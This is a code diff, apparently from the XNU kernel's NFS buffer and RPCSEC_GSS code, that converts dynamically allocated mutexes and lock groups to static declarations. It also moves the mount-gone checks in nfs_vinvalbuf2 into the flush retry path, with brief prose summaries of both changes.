-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
 
        bp->nb_rpcs--;
        finished = (bp->nb_rpcs == 0);
 
        if (multasyncrpc) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 
        if (finished) {
@@ -3364,7 +3361,7 @@ nfs_flushcommits(nfsnode_t np, int nowait)
        if (nowait) {
                flags |= NBI_NOWAIT;
        }
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        wverf = nmp->nm_verf;
        if (!nfs_buf_iterprepare(np, &blist, flags)) {
                while ((bp = LIST_FIRST(&blist))) {
@@ -3439,7 +3436,7 @@ nfs_flushcommits(nfsnode_t np, int nowait)
                }
                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (LIST_EMPTY(&commitlist)) {
                error = ENOBUFS;
@@ -3514,9 +3511,9 @@ nfs_flushcommits(nfsnode_t np, int nowait)
 
                if (retv) {
                        /* move back to dirty list */
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        nfs_buf_release(bp, 1);
                        continue;
                }
@@ -3526,10 +3523,10 @@ nfs_flushcommits(nfsnode_t np, int nowait)
                nfs_node_unlock(np);
                vnode_startwrite(NFSTOV(np));
                if (ISSET(bp->nb_flags, NB_DELWRI)) {
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        nfs_nbdwrite--;
                        NFSBUFCNTCHK();
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        wakeup(&nfs_nbdwrite);
                }
                CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI));
@@ -3543,9 +3540,9 @@ nfs_flushcommits(nfsnode_t np, int nowait)
                }
 
                /* move to clean list */
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
 
                bp->nb_dirtyoff = bp->nb_dirtyend = 0;
 
@@ -3593,13 +3590,13 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr)
                nfs_node_unlock(np);
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        while (np->n_bflag & NBFLUSHINPROG) {
                np->n_bflag |= NBFLUSHWANT;
-               error = msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_flush", NULL);
+               error = msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_flush", NULL);
                if ((error && (error != EWOULDBLOCK)) ||
                    ((error = nfs_sigintr(NFSTONMP(np), NULL, thd, 0)))) {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        goto out;
                }
        }
@@ -3615,7 +3612,7 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr)
 again:
        FSDBG(518, LIST_FIRST(&np->n_dirtyblkhd), np->n_flag, 0, 0);
        if (!NFSTONMP(np)) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                error = ENXIO;
                goto done;
        }
@@ -3641,7 +3638,7 @@ again:
                                                        nfs_buf_refrele(bp);
                                                }
                                                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
-                                               lck_mtx_unlock(nfs_buf_mutex);
+                                               lck_mtx_unlock(&nfs_buf_mutex);
                                                error = error2;
                                                goto done;
                                        }
@@ -3677,14 +3674,14 @@ again:
                                continue;
                        }
                        nfs_buf_remfree(bp);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        if (ISSET(bp->nb_flags, NB_ERROR)) {
                                nfs_node_lock_force(np);
                                np->n_error = bp->nb_error ? bp->nb_error : EIO;
                                np->n_flag |= NWRITEERR;
                                nfs_node_unlock(np);
                                nfs_buf_release(bp, 1);
-                               lck_mtx_lock(nfs_buf_mutex);
+                               lck_mtx_lock(&nfs_buf_mutex);
                                continue;
                        }
                        SET(bp->nb_flags, NB_ASYNC);
@@ -3693,11 +3690,11 @@ again:
                                SET(bp->nb_flags, NB_STABLE);
                        }
                        nfs_buf_write(bp);
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                }
                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (waitfor == MNT_WAIT || waitfor == MNT_DWAIT) {
                while ((error = vnode_waitforwrites(NFSTOV(np), 0, slpflag, slptimeo, "nfsflush"))) {
@@ -3730,7 +3727,7 @@ again:
                        np->n_flag |= NMODIFIED;
                        nfs_node_unlock(np);
                }
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                goto again;
        }
 
@@ -3740,11 +3737,11 @@ again:
                        np->n_flag |= NMODIFIED;
                        nfs_node_unlock(np);
                }
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                if (!LIST_EMPTY(&np->n_dirtyblkhd)) {
                        goto again;
                }
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                nfs_node_lock_force(np);
                /*
                 * OK, it looks like there are no dirty blocks.  If we have no
@@ -3775,10 +3772,10 @@ again:
        }
        nfs_node_unlock(np);
 done:
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        flags = np->n_bflag;
        np->n_bflag &= ~(NBFLUSHINPROG | NBFLUSHWANT);
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        if (flags & NBFLUSHWANT) {
                wakeup(&np->n_bflag);
        }
@@ -3810,7 +3807,7 @@ nfs_vinvalbuf_internal(
                }
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        for (;;) {
                list = NBI_CLEAN;
                if (nfs_buf_iterprepare(np, &blist, list)) {
@@ -3833,13 +3830,13 @@ nfs_vinvalbuf_internal(
                                        FSDBG(554, np, bp, -1, error);
                                        nfs_buf_refrele(bp);
                                        nfs_buf_itercomplete(np, &blist, list);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        return error;
                                }
                        }
                        nfs_buf_refrele(bp);
                        FSDBG(554, np, bp, NBOFF(bp), bp->nb_flags);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        if ((flags & V_SAVE) && UBCINFOEXISTS(NFSTOV(np)) && bp->nb_np &&
                            (NBOFF(bp) < (off_t)np->n_size)) {
                                /* extra paranoia: make sure we're not */
@@ -3921,28 +3918,28 @@ nfs_vinvalbuf_internal(
                                                         * be stuck in this loop forever because
                                                         * the buffer will continue to stay dirty.
                                                         */
-                                                       lck_mtx_lock(nfs_buf_mutex);
+                                                       lck_mtx_lock(&nfs_buf_mutex);
                                                        nfs_buf_itercomplete(np, &blist, list);
-                                                       lck_mtx_unlock(nfs_buf_mutex);
+                                                       lck_mtx_unlock(&nfs_buf_mutex);
                                                        return error;
                                                }
                                                error = 0;
                                        }
-                                       lck_mtx_lock(nfs_buf_mutex);
+                                       lck_mtx_lock(&nfs_buf_mutex);
                                        continue;
                                }
                        }
                        SET(bp->nb_flags, NB_INVAL);
                        // hold off on FREEUPs until we're done here
                        nfs_buf_release(bp, 0);
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                }
                nfs_buf_itercomplete(np, &blist, list);
        }
        if (!LIST_EMPTY(&(np)->n_dirtyblkhd) || !LIST_EMPTY(&(np)->n_cleanblkhd)) {
                panic("nfs_vinvalbuf: flush/inval failed");
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        nfs_node_lock_force(np);
        if (!(flags & V_SAVE)) {
                np->n_flag &= ~NMODIFIED;
@@ -3978,15 +3975,6 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf
 
        FSDBG_TOP(554, np, flags, intrflg, 0);
 
-       /*
-        * If the mount is gone no sense to try and write anything.
-        * and hang trying to do IO.
-        */
-       if (nfs_mount_gone(nmp)) {
-               flags &= ~V_SAVE;
-               ubcflags &= ~UBC_PUSHALL;
-       }
-
        if (nmp && !NMFLAG(nmp, INTR)) {
                intrflg = 0;
        }
@@ -3999,12 +3987,12 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf
        }
 
        /* First wait for any other process doing a flush to complete.  */
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        while (np->n_bflag & NBINVALINPROG) {
                np->n_bflag |= NBINVALWANT;
-               msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts);
+               msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts);
                if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        return error;
                }
                if (np->n_bflag & NBINVALINPROG) {
@@ -4012,10 +4000,15 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf
                }
        }
        np->n_bflag |= NBINVALINPROG;
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        /* Now, flush as required.  */
 again:
+       /* If the mount is gone, there is no sense trying to write anything and hanging on I/O. */
+       if (nfs_mount_gone(nmp)) {
+               flags &= ~V_SAVE;
+       }
+
        error = nfs_vinvalbuf_internal(np, flags, thd, cred, slpflag, 0);
        while (error) {
                FSDBG(554, np, 0, 0, error);
@@ -4025,6 +4018,11 @@ again:
                error = nfs_vinvalbuf_internal(np, flags, thd, cred, 0, slptimeo);
        }
 
+       /* If the mount is gone, there is no sense trying to write anything and hanging on I/O. */
+       if (nfs_mount_gone(nmp)) {
+               ubcflags &= ~UBC_PUSHALL;
+       }
+
        /* get the pages out of vm also */
        if (UBCINFOEXISTS(vp) && (size = ubc_getsize(vp))) {
                if ((error = ubc_msync(vp, 0, size, NULL, ubcflags))) {
@@ -4042,10 +4040,10 @@ again:
                }
        }
 done:
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        nflags = np->n_bflag;
        np->n_bflag &= ~(NBINVALINPROG | NBINVALWANT);
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        if (nflags & NBINVALWANT) {
                wakeup(&np->n_bflag);
        }
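The nfs_vinvalbuf2() hunks above move the nfs_mount_gone() handling from a single check before the flush into the retry path: V_SAVE is dropped at the top of each pass, and UBC_PUSHALL is dropped only just before the ubc_msync() call. A schematic of the resulting flow (heavily condensed; the retry and error handling are as in the hunks, not reproduced here):

    again:
            /* mount gone: don't try to save dirty data over a dead mount */
            if (nfs_mount_gone(nmp)) {
                    flags &= ~V_SAVE;
            }
            error = nfs_vinvalbuf_internal(np, flags, thd, cred, slpflag, 0);
            /* ... retry nfs_vinvalbuf_internal() while it keeps failing ... */

            /* mount gone: don't push dirty pages to the server either */
            if (nfs_mount_gone(nmp)) {
                    ubcflags &= ~UBC_PUSHALL;
            }
            if (UBCINFOEXISTS(vp) && (size = ubc_getsize(vp))) {
                    error = ubc_msync(vp, 0, size, NULL, ubcflags);
            }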
@@ -4064,7 +4062,7 @@ nfs_wait_bufs(nfsnode_t np)
        struct nfsbuflists blist;
        int error = 0;
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (!nfs_buf_iterprepare(np, &blist, NBI_CLEAN)) {
                while ((bp = LIST_FIRST(&blist))) {
                        LIST_REMOVE(bp, nb_vnbufs);
@@ -4074,7 +4072,7 @@ nfs_wait_bufs(nfsnode_t np)
                                if (error != EAGAIN) {
                                        nfs_buf_refrele(bp);
                                        nfs_buf_itercomplete(np, &blist, NBI_CLEAN);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        return;
                                }
                        }
@@ -4092,7 +4090,7 @@ nfs_wait_bufs(nfsnode_t np)
                                if (error != EAGAIN) {
                                        nfs_buf_refrele(bp);
                                        nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        return;
                                }
                        }
@@ -4101,7 +4099,7 @@ nfs_wait_bufs(nfsnode_t np)
                }
                nfs_buf_itercomplete(np, &blist, NBI_DIRTY);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 }
 
 
@@ -4124,7 +4122,7 @@ again:
                return;
        }
 
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        niod = nmp->nm_niod;
 
        /* grab an nfsiod if we don't have one already */
@@ -4140,12 +4138,12 @@ again:
                         * We may try a couple times if other callers
                         * get the new threads before we do.
                         */
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                        started++;
                        if (!nfsiod_start()) {
                                goto again;
                        }
-                       lck_mtx_lock(nfsiod_mutex);
+                       lck_mtx_lock(&nfsiod_mutex);
                }
        }
 
@@ -4179,23 +4177,23 @@ again:
        if (!nmp->nm_niod) {
                if (niod) { /* give it the nfsiod we just grabbed */
                        nmp->nm_niod = niod;
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                        wakeup(niod);
                } else if (nfsiod_thread_count > 0) {
                        /* just queue it up on nfsiod mounts queue if needed */
                        if (nmp->nm_iodlink.tqe_next == NFSNOLIST) {
                                TAILQ_INSERT_TAIL(&nfsiodmounts, nmp, nm_iodlink);
                        }
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                } else {
                        printf("nfs_asyncio(): no nfsiods? %d %d (%d)\n", nfsiod_thread_count, NFSIOD_MAX, started);
-                       lck_mtx_unlock(nfsiod_mutex);
+                       lck_mtx_unlock(&nfsiod_mutex);
                        /* we have no other option but to be persistent */
                        started = 0;
                        goto again;
                }
        } else {
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
        }
 
        FSDBG_BOT(552, nmp, 0, 0, 0);
index 42f8ea0acaf310b098031ca1167884fcacbdc5d6..2d90650f016490d1a899bf8b603e6620fc077933 100644 (file)
 #if CONFIG_NFS_SERVER
 u_long nfs_gss_svc_ctx_hash;
 struct nfs_gss_svc_ctx_hashhead *nfs_gss_svc_ctx_hashtbl;
-lck_mtx_t *nfs_gss_svc_ctx_mutex;
-lck_grp_t *nfs_gss_svc_grp;
+static LCK_GRP_DECLARE(nfs_gss_svc_grp, "rpcsec_gss_svc");
+static LCK_MTX_DECLARE(nfs_gss_svc_ctx_mutex, &nfs_gss_svc_grp);
 uint32_t nfsrv_gss_context_ttl = GSS_CTX_EXPIRE;
 #define GSS_SVC_CTX_TTL ((uint64_t)max(2*GSS_CTX_PEND, nfsrv_gss_context_ttl) * NSEC_PER_SEC)
 #endif /* CONFIG_NFS_SERVER */
 
 #if CONFIG_NFS_CLIENT
-lck_grp_t *nfs_gss_clnt_grp;
+LCK_GRP_DECLARE(nfs_gss_clnt_grp, "rpcsec_gss_clnt");
 #endif /* CONFIG_NFS_CLIENT */
 
 #define KRB5_MAX_MIC_SIZE 128
@@ -186,15 +186,8 @@ const uint32_t nfs_gss_ctx_max = GSS_SVC_MAXCONTEXTS;
 void
 nfs_gss_init(void)
 {
-#if CONFIG_NFS_CLIENT
-       nfs_gss_clnt_grp = lck_grp_alloc_init("rpcsec_gss_clnt", LCK_GRP_ATTR_NULL);
-#endif /* CONFIG_NFS_CLIENT */
-
 #if CONFIG_NFS_SERVER
-       nfs_gss_svc_grp  = lck_grp_alloc_init("rpcsec_gss_svc", LCK_GRP_ATTR_NULL);
-
        nfs_gss_svc_ctx_hashtbl = hashinit(SVC_CTX_HASHSZ, M_TEMP, &nfs_gss_svc_ctx_hash);
-       nfs_gss_svc_ctx_mutex = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL);
 
        nfs_gss_svc_ctx_timer_call = thread_call_allocate(nfs_gss_svc_ctx_timer, NULL);
 #endif /* CONFIG_NFS_SERVER */
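The same static-declaration conversion applies to the RPCSEC_GSS locks: the server-side context mutex and both lock groups are declared up front, so nfs_gss_init() shrinks to the hash-table and timer setup shown above. A sketch combining the two hunks (only declarations and calls visible in the hunks):

    #if CONFIG_NFS_SERVER
    static LCK_GRP_DECLARE(nfs_gss_svc_grp, "rpcsec_gss_svc");
    static LCK_MTX_DECLARE(nfs_gss_svc_ctx_mutex, &nfs_gss_svc_grp);
    #endif /* CONFIG_NFS_SERVER */
    #if CONFIG_NFS_CLIENT
    LCK_GRP_DECLARE(nfs_gss_clnt_grp, "rpcsec_gss_clnt");
    #endif /* CONFIG_NFS_CLIENT */

    void
    nfs_gss_init(void)
    {
    #if CONFIG_NFS_SERVER
            nfs_gss_svc_ctx_hashtbl = hashinit(SVC_CTX_HASHSZ, M_TEMP, &nfs_gss_svc_ctx_hash);
            nfs_gss_svc_ctx_timer_call = thread_call_allocate(nfs_gss_svc_ctx_timer, NULL);
    #endif /* CONFIG_NFS_SERVER */
    }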
@@ -537,12 +530,12 @@ nfs_gss_clnt_ctx_dump(struct nfsmount *nmp)
        lck_mtx_lock(&nmp->nm_lock);
        NFS_GSS_DBG("Enter\n");
        TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                printf("context %d/%d: refcnt = %d, flags = %x\n",
                    kauth_cred_getasid(cp->gss_clnt_cred),
                    kauth_cred_getauid(cp->gss_clnt_cred),
                    cp->gss_clnt_refcnt, cp->gss_clnt_flags);
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
        NFS_GSS_DBG("Exit\n");
        lck_mtx_unlock(&nmp->nm_lock);
@@ -676,12 +669,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
        microuptime(&now);
        lck_mtx_lock(&nmp->nm_lock);
        TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
                        NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n",
                            NFS_GSS_CTX(req, cp),
                            cp->gss_clnt_refcnt);
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        continue;
                }
                if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, req->r_cred)) {
@@ -698,7 +691,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                    bcmp(cp->gss_clnt_principal, principal, plen) != 0) {
                                        cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY);
                                        cp->gss_clnt_refcnt++;
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        NFS_GSS_DBG("Marking %s for deletion because %s does not match\n",
                                            NFS_GSS_CTX(req, cp), principal);
                                        NFS_GSS_DBG("len = (%zu,%zu), nt = (%d,%d)\n", cp->gss_clnt_prinlen, plen,
@@ -717,7 +710,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                if (cp->gss_clnt_nctime + GSS_NEG_CACHE_TO >= now.tv_sec || cp->gss_clnt_nctime == 0) {
                                        NFS_GSS_DBG("Context %s (refcnt = %d) not expired returning EAUTH nctime = %ld now = %ld\n",
                                            NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt, cp->gss_clnt_nctime, now.tv_sec);
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        lck_mtx_unlock(&nmp->nm_lock);
                                        NFS_ZFREE(nfs_req_zone, treq);
                                        return NFSERR_EAUTH;
@@ -733,7 +726,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                        NFS_GSS_DBG("Context %s has expired but we still have %d references\n",
                                            NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt);
                                        error = nfs_gss_clnt_ctx_copy(cp, &ncp);
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        if (error) {
                                                lck_mtx_unlock(&nmp->nm_lock);
                                                NFS_ZFREE(nfs_req_zone, treq);
@@ -745,7 +738,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                                        if (cp->gss_clnt_nctime) {
                                                nmp->nm_ncentries--;
                                        }
-                                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                                        TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries);
                                        break;
                                }
@@ -753,12 +746,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                        /* Found a valid context to return */
                        cp->gss_clnt_refcnt++;
                        req->r_gss_ctx = cp;
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        lck_mtx_unlock(&nmp->nm_lock);
                        NFS_ZFREE(nfs_req_zone, treq);
                        return 0;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
 
        if (!cp && nfs_root_steals_ctx && principal == NULL && kauth_cred_getuid(req->r_cred) == 0) {
@@ -798,7 +791,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p
                }
                cp->gss_clnt_cred = req->r_cred;
                kauth_cred_ref(cp->gss_clnt_cred);
-               cp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL);
                cp->gss_clnt_ptime = now.tv_sec - GSS_PRINT_DELAY;
                if (principal) {
                        MALLOC(cp->gss_clnt_principal, uint8_t *, plen + 1, M_TEMP, M_WAITOK | M_ZERO);
@@ -905,10 +898,10 @@ retry:
         * doing the context setup. Wait until the context thread
         * is null.
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (cp->gss_clnt_thread && cp->gss_clnt_thread != current_thread()) {
                cp->gss_clnt_flags |= GSS_NEEDCTX;
-               msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL);
+               msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL);
                slpflag &= ~PCATCH;
                if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) {
                        return error;
@@ -916,7 +909,7 @@ retry:
                nfs_gss_clnt_ctx_unref(req);
                goto retry;
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        if (cp->gss_clnt_flags & GSS_CTX_COMPLETE) {
                /*
@@ -926,26 +919,26 @@ retry:
                 * we allocate a new sequence number and allow this request
                 * to proceed.
                 */
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                while (win_getbit(cp->gss_clnt_seqbits,
                    ((cp->gss_clnt_seqnum - cp->gss_clnt_seqwin) + 1) % cp->gss_clnt_seqwin)) {
                        cp->gss_clnt_flags |= GSS_NEEDSEQ;
-                       msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL);
+                       msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL);
                        slpflag &= ~PCATCH;
                        if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) {
                                return error;
                        }
-                       lck_mtx_lock(cp->gss_clnt_mtx);
+                       lck_mtx_lock(&cp->gss_clnt_mtx);
                        if (cp->gss_clnt_flags & GSS_CTX_INVAL) {
                                /* Renewed while we were waiting */
-                               lck_mtx_unlock(cp->gss_clnt_mtx);
+                               lck_mtx_unlock(&cp->gss_clnt_mtx);
                                nfs_gss_clnt_ctx_unref(req);
                                goto retry;
                        }
                }
                seqnum = ++cp->gss_clnt_seqnum;
                win_setbit(cp->gss_clnt_seqbits, seqnum % cp->gss_clnt_seqwin);
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
 
                MALLOC(gsp, struct gss_seq *, sizeof(*gsp), M_TEMP, M_WAITOK | M_ZERO);
                if (gsp == NULL) {
@@ -1489,9 +1482,9 @@ retry:
        /*
         * The context is apparently established successfully
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        cp->gss_clnt_flags |= GSS_CTX_COMPLETE;
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
        cp->gss_clnt_proc = RPCSEC_GSS_DATA;
 
        network_seqnum = htonl(cp->gss_clnt_seqwin);
@@ -1543,7 +1536,7 @@ nfsmout:
         * It will be removed when the reference count
         * drops to zero.
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (error) {
                cp->gss_clnt_flags |= GSS_CTX_INVAL;
        }
@@ -1556,7 +1549,7 @@ nfsmout:
                cp->gss_clnt_flags &= ~GSS_NEEDCTX;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        NFS_GSS_DBG("Returning error = %d\n", error);
        return error;
@@ -1620,7 +1613,7 @@ bad:
        /*
         * Give up on this context
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        cp->gss_clnt_flags |= GSS_CTX_INVAL;
 
        /*
@@ -1631,7 +1624,7 @@ bad:
                cp->gss_clnt_flags &= ~GSS_NEEDCTX;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        return error;
 }
@@ -2214,7 +2207,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req)
         * sequence number window to indicate it's done.
         * We do this even if the request timed out.
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        gsp = SLIST_FIRST(&req->r_gss_seqlist);
        if (gsp && gsp->gss_seqnum > (cp->gss_clnt_seqnum - cp->gss_clnt_seqwin)) {
                win_resetbit(cp->gss_clnt_seqbits,
@@ -2239,7 +2232,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req)
                cp->gss_clnt_flags &= ~GSS_NEEDSEQ;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 }
 
 /*
@@ -2251,9 +2244,9 @@ nfs_gss_clnt_ctx_ref(struct nfsreq *req, struct nfs_gss_clnt_ctx *cp)
 {
        req->r_gss_ctx = cp;
 
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        cp->gss_clnt_refcnt++;
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 }
 
 /*
@@ -2278,7 +2271,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req)
 
        req->r_gss_ctx = NULL;
 
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (--cp->gss_clnt_refcnt < 0) {
                panic("Over release of gss context!\n");
        }
@@ -2305,7 +2298,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req)
                cp->gss_clnt_nctime = now.tv_sec;
                neg_cache = 1;
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
        if (destroy) {
                NFS_GSS_DBG("Destroying context %s\n", NFS_GSS_CTX(req, cp));
                if (nmp) {
